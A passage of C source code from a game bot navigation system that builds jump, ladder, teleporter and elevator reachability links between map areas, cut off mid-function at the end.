return qfalse;
if (trace.fraction < 1)
{
plane = &aasworld.planes[trace.planenum];
// if the bot can stand on the surface
if (DotProduct(plane->normal, up) >= 0.7)
{
// if no lava or slime below
if (!(AAS_PointContents(trace.endpos) & (CONTENTS_LAVA|CONTENTS_SLIME)))
{
if (teststart[2] - trace.endpos[2] <= aassettings.phys_maxbarrier)
return qfalse;
} //end if
} //end if
} //end if
//
// get command movement
VectorClear(cmdmove);
if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_JUMP)
cmdmove[2] = aassettings.phys_jumpvel;
else
cmdmove[2] = 0;
//
VectorSubtract(bestend, beststart, dir);
dir[2] = 0;
VectorNormalize(dir);
CrossProduct(dir, up, sidewards);
//
stopevent = SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE;
if (!AAS_AreaClusterPortal(area1num) && !AAS_AreaClusterPortal(area2num))
stopevent |= SE_TOUCHCLUSTERPORTAL;
//
for (i = 0; i < 3; i++)
{
//
if (i == 1)
VectorAdd(testend, sidewards, testend);
else if (i == 2)
VectorSubtract(bestend, sidewards, testend);
else
VectorCopy(bestend, testend);
VectorSubtract(testend, beststart, dir);
dir[2] = 0;
VectorNormalize(dir);
VectorScale(dir, speed, velocity);
//
AAS_PredictClientMovement(&move, -1, beststart, PRESENCE_NORMAL, qtrue,
velocity, cmdmove, 3, 30, 0.1f,
stopevent, 0, qfalse);
// if prediction time wasn't enough to fully predict the movement
if (move.frames >= 30)
return qfalse;
// don't enter slime or lava and don't fall from too high
if (move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA))
return qfalse;
// never jump or fall through a cluster portal
if (move.stopevent & SE_TOUCHCLUSTERPORTAL)
return qfalse;
//the end position should be in area2, also test a little bit back
//because the predicted jump could have rushed through the area
VectorMA(move.endpos, -64, dir, teststart);
teststart[2] += 1;
numareas = AAS_TraceAreas(move.endpos, teststart, areas, NULL, ARRAY_LEN(areas));
for (j = 0; j < numareas; j++)
{
if (areas[j] == area2num)
break;
} //end for
if (j < numareas)
break;
}
if (i >= 3)
return qfalse;
//
#ifdef REACH_DEBUG
//create the reachability
Log_Write("jump reachability between %d and %d\r\n", area1num, area2num);
#endif //REACH_DEBUG
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(beststart, lreach->start);
VectorCopy(bestend, lreach->end);
lreach->traveltype = traveltype;
VectorSubtract(bestend, beststart, dir);
height = dir[2];
dir[2] = 0;
if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_WALKOFFLEDGE && height > VectorLength(dir))
{
lreach->traveltime = aassettings.rs_startwalkoffledge + height * 50 / aassettings.phys_gravity;
}
else
{
lreach->traveltime = aassettings.rs_startjump + VectorDistance(bestend, beststart) * 240 / aassettings.phys_maxwalkvelocity;
} //end if
//
if (!AAS_AreaJumpPad(area2num))
{
if (AAS_FallDelta(beststart[2] - bestend[2]) > aassettings.phys_falldelta5)
{
lreach->traveltime += aassettings.rs_falldamage5;
} //end if
else if (AAS_FallDelta(beststart[2] - bestend[2]) > aassettings.phys_falldelta10)
{
lreach->traveltime += aassettings.rs_falldamage10;
} //end if
} //end if
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
if ((traveltype & TRAVELTYPE_MASK) == TRAVEL_JUMP)
reach_jump++;
else
reach_walkoffledge++;
} //end if
return qfalse;
} //end of the function AAS_Reachability_Jump
//===========================================================================
// create a possible ladder reachability from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Ladder(int area1num, int area2num)
{
int i, j, k, l, edge1num, edge2num, sharededgenum = 0, lowestedgenum = 0;
int face1num, face2num, ladderface1num = 0, ladderface2num = 0;
int ladderface1vertical, ladderface2vertical, firstv;
float face1area, face2area, bestface1area = -9999, bestface2area = -9999;
float phys_jumpvel, maxjumpheight;
vec3_t area1point, area2point, v1, v2, up = {0, 0, 1};
vec3_t mid, lowestpoint = {0, 0}, start, end, sharededgevec, dir;
aas_area_t *area1, *area2;
aas_face_t *face1, *face2, *ladderface1 = NULL, *ladderface2 = NULL;
aas_plane_t *plane1, *plane2;
aas_edge_t *sharededge, *edge1;
aas_lreachability_t *lreach;
aas_trace_t trace;
if (!AAS_AreaLadder(area1num) || !AAS_AreaLadder(area2num)) return qfalse;
//
phys_jumpvel = aassettings.phys_jumpvel;
//maximum height a player can jump with the given initial z velocity
maxjumpheight = AAS_MaxJumpHeight(phys_jumpvel);
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
for (i = 0; i < area1->numfaces; i++)
{
face1num = aasworld.faceindex[area1->firstface + i];
face1 = &aasworld.faces[abs(face1num)];
//if not a ladder face
if (!(face1->faceflags & FACE_LADDER)) continue;
//
for (j = 0; j < area2->numfaces; j++)
{
face2num = aasworld.faceindex[area2->firstface + j];
face2 = &aasworld.faces[abs(face2num)];
//if not a ladder face
if (!(face2->faceflags & FACE_LADDER)) continue;
//check if the faces share an edge
for (k = 0; k < face1->numedges; k++)
{
edge1num = aasworld.edgeindex[face1->firstedge + k];
for (l = 0; l < face2->numedges; l++)
{
edge2num = aasworld.edgeindex[face2->firstedge + l];
if (abs(edge1num) == abs(edge2num))
{
//get the face with the largest area
face1area = AAS_FaceArea(face1);
face2area = AAS_FaceArea(face2);
if (face1area > bestface1area && face2area > bestface2area)
{
bestface1area = face1area;
bestface2area = face2area;
ladderface1 = face1;
ladderface2 = face2;
ladderface1num = face1num;
ladderface2num = face2num;
sharededgenum = edge1num;
} //end if
break;
} //end if
} //end for
if (l != face2->numedges) break;
} //end for
} //end for
} //end for
//
if (ladderface1 && ladderface2)
{
//get the middle of the shared edge
sharededge = &aasworld.edges[abs(sharededgenum)];
firstv = sharededgenum < 0;
//
VectorCopy(aasworld.vertexes[sharededge->v[firstv]], v1);
VectorCopy(aasworld.vertexes[sharededge->v[!firstv]], v2);
VectorAdd(v1, v2, area1point);
VectorScale(area1point, 0.5, area1point);
VectorCopy(area1point, area2point);
//
//if the face plane in area 1 is pretty much vertical
plane1 = &aasworld.planes[ladderface1->planenum ^ (ladderface1num < 0)];
plane2 = &aasworld.planes[ladderface2->planenum ^ (ladderface2num < 0)];
//
//get the points really into the areas
VectorSubtract(v2, v1, sharededgevec);
CrossProduct(plane1->normal, sharededgevec, dir);
VectorNormalize(dir);
//NOTE: 32 because that's larger than 16 (bot bbox x,y)
VectorMA(area1point, -32, dir, area1point);
VectorMA(area2point, 32, dir, area2point);
//
ladderface1vertical = abs(DotProduct(plane1->normal, up)) < 0.1;
ladderface2vertical = abs(DotProduct(plane2->normal, up)) < 0.1;
//there's only reachability between vertical ladder faces
if (!ladderface1vertical && !ladderface2vertical) return qfalse;
//if both vertical ladder faces
if (ladderface1vertical && ladderface2vertical
//and the ladder faces do not make a sharp corner
&& DotProduct(plane1->normal, plane2->normal) > 0.7
//and the shared edge is not too vertical
&& abs(DotProduct(sharededgevec, up)) < 0.7)
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area1point, lreach->start);
//VectorCopy(area2point, lreach->end);
VectorMA(area2point, -3, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface2num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area2point, lreach->start);
//VectorCopy(area1point, lreach->end);
VectorMA(area1point, -3, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_ladder++;
//
return qtrue;
} //end if
//if the second ladder face is also a ground face
//create ladder end (just ladder) reachability and
//walk off a ladder (ledge) reachability
if (ladderface1vertical && (ladderface2->faceflags & FACE_GROUND))
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area1point, lreach->start);
VectorCopy(area2point, lreach->end);
lreach->end[2] += 16;
VectorMA(lreach->end, -15, plane1->normal, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface2num;
lreach->edgenum = abs(sharededgenum);
VectorCopy(area2point, lreach->start);
VectorCopy(area1point, lreach->end);
lreach->traveltype = TRAVEL_WALKOFFLEDGE;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_walkoffledge++;
//
return qtrue;
} //end if
//
if (ladderface1vertical)
{
//find lowest edge of the ladder face
lowestpoint[2] = 99999;
for (i = 0; i < ladderface1->numedges; i++)
{
edge1num = abs(aasworld.edgeindex[ladderface1->firstedge + i]);
edge1 = &aasworld.edges[edge1num];
//
VectorCopy(aasworld.vertexes[edge1->v[0]], v1);
VectorCopy(aasworld.vertexes[edge1->v[1]], v2);
//
VectorAdd(v1, v2, mid);
VectorScale(mid, 0.5, mid);
//
if (mid[2] < lowestpoint[2])
{
VectorCopy(mid, lowestpoint);
lowestedgenum = edge1num;
} //end if
} //end for
//
plane1 = &aasworld.planes[ladderface1->planenum];
//trace down in the middle of this edge
VectorMA(lowestpoint, 5, plane1->normal, start);
VectorCopy(start, end);
start[2] += 5;
end[2] -= 100;
//trace without entity collision
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//
//
#ifdef REACH_DEBUG
if (trace.startsolid)
{
Log_Write("trace from area %d started in solid\r\n", area1num);
} //end if
#endif //REACH_DEBUG
//
trace.endpos[2] += 1;
area2num = AAS_PointAreaNum(trace.endpos);
//
area2 = &aasworld.areas[area2num];
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//
if (face2->faceflags & FACE_LADDER)
{
plane2 = &aasworld.planes[face2->planenum];
if (abs(DotProduct(plane2->normal, up)) < 0.1) break;
} //end if
} //end for
//if from another area without vertical ladder faces
if (i >= area2->numfaces && area2num != area1num &&
//the reachabilities shouldn't exist already
!AAS_ReachabilityExists(area1num, area2num) &&
!AAS_ReachabilityExists(area2num, area1num))
{
//if the height is jumpable
if (start[2] - trace.endpos[2] < maxjumpheight)
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(lowestpoint, lreach->start);
VectorCopy(trace.endpos, lreach->end);
lreach->traveltype = TRAVEL_LADDER;
lreach->traveltime = 10;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_ladder++;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(trace.endpos, lreach->start);
//get the end point a little bit into the ladder
VectorMA(lowestpoint, -5, plane1->normal, lreach->end);
//get the end point a little higher
lreach->end[2] += 10;
lreach->traveltype = TRAVEL_JUMP;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_jump++;
//
return qtrue;
#ifdef REACH_DEBUG
Log_Write("jump up to ladder reach between %d and %d\r\n", area2num, area1num);
#endif //REACH_DEBUG
} //end if
#ifdef REACH_DEBUG
else Log_Write("jump too high between area %d and %d\r\n", area2num, area1num);
#endif //REACH_DEBUG
} //end if
/*//if slime or lava below the ladder
//try jump reachability from far towards the ladder
if (aasworld.areasettings[area2num].contents & (AREACONTENTS_SLIME
| AREACONTENTS_LAVA))
{
for (i = 20; i <= 120; i += 20)
{
//trace down in the middle of this edge
VectorMA(lowestpoint, i, plane1->normal, start);
VectorCopy(start, end);
start[2] += 5;
end[2] -= 100;
//trace without entity collision
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//
if (trace.startsolid) break;
trace.endpos[2] += 1;
area2num = AAS_PointAreaNum(trace.endpos);
if (area2num == area1num) continue;
//
if (start[2] - trace.endpos[2] > maxjumpheight) continue;
if (aasworld.areasettings[area2num].contents & (AREACONTENTS_SLIME
| AREACONTENTS_LAVA)) continue;
//
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area1num;
lreach->facenum = ladderface1num;
lreach->edgenum = lowestedgenum;
VectorCopy(trace.endpos, lreach->start);
VectorCopy(lowestpoint, lreach->end);
lreach->end[2] += 5;
lreach->traveltype = TRAVEL_JUMP;
lreach->traveltime = 10;
lreach->next = areareachability[area2num];
areareachability[area2num] = lreach;
//
reach_jump++;
//
Log_Write("jump far to ladder reach between %d and %d\r\n", area2num, area1num);
//
break;
} //end for
} //end if*/
} //end if
} //end if
return qfalse;
} //end of the function AAS_Reachability_Ladder
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_TravelFlagsForTeam(int ent)
{
int notteam;
if (!AAS_IntForBSPEpairKey(ent, "bot_notteam", ¬team))
return 0;
if (notteam == 1)
return TRAVELFLAG_NOTTEAM1;
if (notteam == 2)
return TRAVELFLAG_NOTTEAM2;
return 0;
} //end of the function AAS_TravelFlagsForTeam
//===========================================================================
// create possible teleporter reachabilities
// this is very game dependent.... :(
//
// classname = trigger_multiple or trigger_teleport
// target = "t1"
//
// classname = target_teleporter
// targetname = "t1"
// target = "t2"
//
// classname = misc_teleporter_dest
// targetname = "t2"
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_Teleport(void)
{
int area1num, area2num;
char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY];
char classname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
int ent, dest;
float angle;
vec3_t origin, destorigin, mins, maxs, end, angles;
vec3_t mid, velocity, cmdmove;
aas_lreachability_t *lreach;
aas_clientmove_t move;
aas_trace_t trace;
aas_link_t *areas, *link;
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "trigger_multiple"))
{
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
//#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "trigger_multiple model = \"%s\"\n", model);
//#endif REACH_DEBUG
VectorClear(angles);
AAS_BSPModelMinsMaxsOrigin(atoi(model+1), angles, mins, maxs, origin);
//
if (!AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "trigger_multiple at %1.0f %1.0f %1.0f without target\n",
origin[0], origin[1], origin[2]);
continue;
} //end if
for (dest = AAS_NextBSPEntity(0); dest; dest = AAS_NextBSPEntity(dest))
{
if (!AAS_ValueForBSPEpairKey(dest, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "target_teleporter"))
{
if (!AAS_ValueForBSPEpairKey(dest, "targetname", targetname, MAX_EPAIRKEY)) continue;
if (!strcmp(targetname, target))
{
break;
} //end if
} //end if
} //end for
if (!dest)
{
continue;
} //end if
if (!AAS_ValueForBSPEpairKey(dest, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "target_teleporter without target\n");
continue;
} //end if
} //end else
else if (!strcmp(classname, "trigger_teleport"))
{
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
//#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "trigger_teleport model = \"%s\"\n", model);
//#endif REACH_DEBUG
VectorClear(angles);
AAS_BSPModelMinsMaxsOrigin(atoi(model+1), angles, mins, maxs, origin);
//
if (!AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "trigger_teleport at %1.0f %1.0f %1.0f without target\n",
origin[0], origin[1], origin[2]);
continue;
} //end if
} //end if
else
{
continue;
} //end else
//
for (dest = AAS_NextBSPEntity(0); dest; dest = AAS_NextBSPEntity(dest))
{
//classname should be misc_teleporter_dest
//but I've also seen target_position and actually any
//entity could be used... burp
if (AAS_ValueForBSPEpairKey(dest, "targetname", targetname, MAX_EPAIRKEY))
{
if (!strcmp(targetname, target))
{
break;
} //end if
} //end if
} //end for
if (!dest)
{
botimport.Print(PRT_ERROR, "teleporter without misc_teleporter_dest (%s)\n", target);
continue;
} //end if
if (!AAS_VectorForBSPEpairKey(dest, "origin", destorigin))
{
botimport.Print(PRT_ERROR, "teleporter destination (%s) without origin\n", target);
continue;
} //end if
//
area2num = AAS_PointAreaNum(destorigin);
//if not teleported into a teleporter or into a jumppad
if (!AAS_AreaTeleporter(area2num) && !AAS_AreaJumpPad(area2num))
{
VectorCopy(destorigin, end);
end[2] -= 64;
trace = AAS_TraceClientBBox(destorigin, end, PRESENCE_CROUCH, -1);
if (trace.startsolid)
{
botimport.Print(PRT_ERROR, "teleporter destination (%s) in solid\n", target);
continue;
} //end if
/*
area2num = AAS_PointAreaNum(trace.endpos);
//
if (!AAS_AreaTeleporter(area2num) &&
!AAS_AreaJumpPad(area2num) &&
!AAS_AreaGrounded(area2num))
{
VectorCopy(trace.endpos, destorigin);
}
else*/
{
//predict where you'll end up
AAS_FloatForBSPEpairKey(dest, "angle", &angle);
if (angle)
{
VectorSet(angles, 0, angle, 0);
AngleVectors(angles, velocity, NULL, NULL);
VectorScale(velocity, 400, velocity);
} //end if
else
{
VectorClear(velocity);
} //end else
VectorClear(cmdmove);
AAS_PredictClientMovement(&move, -1, destorigin, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 0, 30, 0.1f,
SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER, 0, qfalse); //qtrue);
area2num = AAS_PointAreaNum(move.endpos);
if (move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA))
{
botimport.Print(PRT_WARNING, "teleported into slime or lava at dest %s\n", target);
} //end if
VectorCopy(move.endpos, destorigin);
} //end else
} //end if
//
//botimport.Print(PRT_MESSAGE, "teleporter brush origin at %f %f %f\n", origin[0], origin[1], origin[2]);
//botimport.Print(PRT_MESSAGE, "teleporter brush mins = %f %f %f\n", mins[0], mins[1], mins[2]);
//botimport.Print(PRT_MESSAGE, "teleporter brush maxs = %f %f %f\n", maxs[0], maxs[1], maxs[2]);
VectorAdd(origin, mins, mins);
VectorAdd(origin, maxs, maxs);
//
VectorAdd(mins, maxs, mid);
VectorScale(mid, 0.5, mid);
//link an invalid (-1) entity
areas = AAS_LinkEntityClientBBox(mins, maxs, -1, PRESENCE_CROUCH);
if (!areas) botimport.Print(PRT_MESSAGE, "trigger_multiple not in any area\n");
//
for (link = areas; link; link = link->next_area)
{
//if (!AAS_AreaGrounded(link->areanum)) continue;
if (!AAS_AreaTeleporter(link->areanum)) continue;
//
area1num = link->areanum;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) break;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(mid, lreach->start);
VectorCopy(destorigin, lreach->end);
lreach->traveltype = TRAVEL_TELEPORT;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_teleport;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_teleport++;
} //end for
//unlink the invalid entity
AAS_UnlinkFromAreas(areas);
} //end for
} //end of the function AAS_Reachability_Teleport
//===========================================================================
// create possible elevator (func_plat) reachabilities
// this is very game dependent.... :(
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_Elevator(void)
{
int area1num, area2num, modelnum, i, j, k, l, n, p;
float lip, height, speed;
char model[MAX_EPAIRKEY], classname[MAX_EPAIRKEY];
int ent;
vec3_t mins, maxs, origin, angles = {0, 0, 0};
vec3_t pos1, pos2, mids, platbottom, plattop;
vec3_t bottomorg, toporg, start, end, dir;
float xvals[8], yvals[8], xvals_top[8], yvals_top[8];
aas_lreachability_t *lreach;
aas_trace_t trace;
#ifdef REACH_DEBUG
Log_Write("AAS_Reachability_Elevator\r\n");
#endif //REACH_DEBUG
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "func_plat"))
{
#ifdef REACH_DEBUG
Log_Write("found func plat\r\n");
#endif //REACH_DEBUG
if (!AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "func_plat without model\n");
continue;
} //end if
//get the model number, and skip the leading *
modelnum = atoi(model+1);
if (modelnum <= 0)
{
botimport.Print(PRT_ERROR, "func_plat with invalid model number\n");
continue;
} //end if
//get the mins, maxs and origin of the model
//NOTE: the origin is usually (0,0,0) and the mins and maxs
// are the absolute mins and maxs
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, mins, maxs, origin);
//
AAS_VectorForBSPEpairKey(ent, "origin", origin);
//pos1 is the top position, pos2 is the bottom
VectorCopy(origin, pos1);
VectorCopy(origin, pos2);
//get the lip of the plat
AAS_FloatForBSPEpairKey(ent, "lip", &lip);
if (!lip) lip = 8;
//get the movement height of the plat
AAS_FloatForBSPEpairKey(ent, "height", &height);
if (!height) height = (maxs[2] - mins[2]) - lip;
//get the speed of the plat
AAS_FloatForBSPEpairKey(ent, "speed", &speed);
if (!speed) speed = 200;
//get bottom position below pos1
pos2[2] -= height;
//
//get a point just above the plat in the bottom position
VectorAdd(mins, maxs, mids);
VectorMA(pos2, 0.5, mids, platbottom);
platbottom[2] = maxs[2] - (pos1[2] - pos2[2]) + 2;
//get a point just above the plat in the top position
VectorAdd(mins, maxs, mids);
VectorMA(pos2, 0.5, mids, plattop);
plattop[2] = maxs[2] + 2;
//
/*if (!area1num)
{
Log_Write("no grounded area near plat bottom\r\n");
continue;
} //end if*/
//get the mins and maxs a little larger
for (i = 0; i < 3; i++)
{
mins[i] -= 1;
maxs[i] += 1;
} //end for
//
//botimport.Print(PRT_MESSAGE, "platbottom[2] = %1.1f plattop[2] = %1.1f\n", platbottom[2], plattop[2]);
//
VectorAdd(mins, maxs, mids);
VectorScale(mids, 0.5, mids);
//
xvals[0] = mins[0]; xvals[1] = mids[0]; xvals[2] = maxs[0]; xvals[3] = mids[0];
yvals[0] = mids[1]; yvals[1] = maxs[1]; yvals[2] = mids[1]; yvals[3] = mins[1];
//
xvals[4] = mins[0]; xvals[5] = maxs[0]; xvals[6] = maxs[0]; xvals[7] = mins[0];
yvals[4] = maxs[1]; yvals[5] = maxs[1]; yvals[6] = mins[1]; yvals[7] = mins[1];
//find adjacent areas around the bottom of the plat
for (i = 0; i < 9; i++)
{
if (i < 8) //check at the sides of the plat
{
bottomorg[0] = origin[0] + xvals[i];
bottomorg[1] = origin[1] + yvals[i];
bottomorg[2] = platbottom[2] + 16;
//get a grounded or swim area near the plat in the bottom position
area1num = AAS_PointAreaNum(bottomorg);
for (k = 0; k < 16; k++)
{
if (area1num)
{
if (AAS_AreaGrounded(area1num) || AAS_AreaSwim(area1num)) break;
} //end if
bottomorg[2] += 4;
area1num = AAS_PointAreaNum(bottomorg);
} //end if
//if in solid
if (k >= 16)
{
continue;
} //end if
} //end if
else //at the middle of the plat
{
VectorCopy(plattop, bottomorg);
bottomorg[2] += 24;
area1num = AAS_PointAreaNum(bottomorg);
if (!area1num) continue;
VectorCopy(platbottom, bottomorg);
bottomorg[2] += 24;
} //end else
//look at adjacent areas around the top of the plat
//make larger steps to outside the plat everytime
for (n = 0; n < 3; n++)
{
for (k = 0; k < 3; k++)
{
mins[k] -= 4;
maxs[k] += 4;
} //end for
xvals_top[0] = mins[0]; xvals_top[1] = mids[0]; xvals_top[2] = maxs[0]; xvals_top[3] = mids[0];
yvals_top[0] = mids[1]; yvals_top[1] = maxs[1]; yvals_top[2] = mids[1]; yvals_top[3] = mins[1];
//
xvals_top[4] = mins[0]; xvals_top[5] = maxs[0]; xvals_top[6] = maxs[0]; xvals_top[7] = mins[0];
yvals_top[4] = maxs[1]; yvals_top[5] = maxs[1]; yvals_top[6] = mins[1]; yvals_top[7] = mins[1];
//
for (j = 0; j < 8; j++)
{
toporg[0] = origin[0] + xvals_top[j];
toporg[1] = origin[1] + yvals_top[j];
toporg[2] = plattop[2] + 16;
//get a grounded or swim area near the plat in the top position
area2num = AAS_PointAreaNum(toporg);
for (l = 0; l < 16; l++)
{
if (area2num)
{
if (AAS_AreaGrounded(area2num) || AAS_AreaSwim(area2num))
{
VectorCopy(plattop, start);
start[2] += 32;
VectorCopy(toporg, end);
end[2] += 1;
trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
if (trace.fraction >= 1) break;
} //end if
} //end if
toporg[2] += 4;
area2num = AAS_PointAreaNum(toporg);
} //end if
//if in solid
if (l >= 16) continue;
//never create a reachability in the same area
if (area2num == area1num) continue;
//if the area isn't grounded
if (!AAS_AreaGrounded(area2num)) continue;
//if there already exists reachability between the areas
if (AAS_ReachabilityExists(area1num, area2num)) continue;
//if the reachability start is within the elevator bounding box
VectorSubtract(bottomorg, platbottom, dir);
VectorNormalize(dir);
dir[0] = bottomorg[0] + 24 * dir[0];
dir[1] = bottomorg[1] + 24 * dir[1];
dir[2] = bottomorg[2];
//
for (p = 0; p < 3; p++)
if (dir[p] < origin[p] + mins[p] || dir[p] > origin[p] + maxs[p]) break;
if (p >= 3) continue;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) continue;
lreach->areanum = area2num;
//the facenum is the model number
lreach->facenum = modelnum;
//the edgenum is the height
lreach->edgenum = (int) height;
//
VectorCopy(dir, lreach->start);
VectorCopy(toporg, lreach->end);
lreach->traveltype = TRAVEL_ELEVATOR;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_startelevator + height * 100 / speed;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//don't go any further to the outside
n = 9999;
//
#ifdef REACH_DEBUG
Log_Write("elevator reach from %d to %d\r\n", area1num, area2num);
#endif //REACH_DEBUG
//
reach_elevator++;
} //end for
} //end for
} //end for
} //end if
} //end for
} //end of the function AAS_Reachability_Elevator
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
aas_lreachability_t *AAS_FindFaceReachabilities(vec3_t *facepoints, int numpoints, aas_plane_t *plane, int towardsface)
{
int i, j, k, l;
int facenum, edgenum, bestfacenum;
float *v1, *v2, *v3, *v4;
float bestdist, speed, hordist, dist;
vec3_t beststart, beststart2, bestend, bestend2, tmp, hordir, testpoint;
aas_lreachability_t *lreach, *lreachabilities;
aas_area_t *area;
aas_face_t *face;
aas_edge_t *edge;
aas_plane_t *faceplane, *bestfaceplane;
//
lreachabilities = NULL;
bestfacenum = 0;
bestfaceplane = NULL;
//
for (i = 1; i < aasworld.numareas; i++)
{
area = &aasworld.areas[i];
// get the shortest distance between one of the func_bob start edges and
// one of the face edges of area1
bestdist = 999999;
for (j = 0; j < area->numfaces; j++)
{
facenum = aasworld.faceindex[area->firstface + j];
face = &aasworld.faces[abs(facenum)];
//if not a ground face
if (!(face->faceflags & FACE_GROUND)) continue;
//get the ground planes
faceplane = &aasworld.planes[face->planenum];
//
for (k = 0; k < face->numedges; k++)
{
edgenum = abs(aasworld.edgeindex[face->firstedge + k]);
edge = &aasworld.edges[edgenum];
//calculate the minimum distance between the two edges
v1 = aasworld.vertexes[edge->v[0]];
v2 = aasworld.vertexes[edge->v[1]];
//
for (l = 0; l < numpoints; l++)
{
v3 = facepoints[l];
v4 = facepoints[(l+1) % numpoints];
dist = AAS_ClosestEdgePoints(v1, v2, v3, v4, faceplane, plane,
beststart, bestend,
beststart2, bestend2, bestdist);
if (dist < bestdist)
{
bestfacenum = facenum;
bestfaceplane = faceplane;
bestdist = dist;
} //end if
} //end for
} //end for
} //end for
//
if (bestdist > 192) continue;
//
VectorMiddle(beststart, beststart2, beststart);
VectorMiddle(bestend, bestend2, bestend);
//
if (!towardsface)
{
VectorCopy(beststart, tmp);
VectorCopy(bestend, beststart);
VectorCopy(tmp, bestend);
} //end if
//
VectorSubtract(bestend, beststart, hordir);
hordir[2] = 0;
hordist = VectorLength(hordir);
//
if (hordist > 2 * AAS_MaxJumpDistance(aassettings.phys_jumpvel)) continue;
//the end point should not be significantly higher than the start point
if (bestend[2] - 32 > beststart[2]) continue;
//don't fall down too far
if (bestend[2] < beststart[2] - 128) continue;
//the distance should not be too far
if (hordist > 32)
{
//check for walk off ledge
if (!AAS_HorizontalVelocityForJump(0, beststart, bestend, &speed)) continue;
} //end if
//
beststart[2] += 1;
bestend[2] += 1;
//
if (towardsface) VectorCopy(bestend, testpoint);
else VectorCopy(beststart, testpoint);
testpoint[2] = 0;
testpoint[2] = (bestfaceplane->dist - DotProduct(bestfaceplane->normal, testpoint)) / bestfaceplane->normal[2];
//
if (!AAS_PointInsideFace(bestfacenum, testpoint, 0.1f))
{
//if the faces are not overlapping then only go down
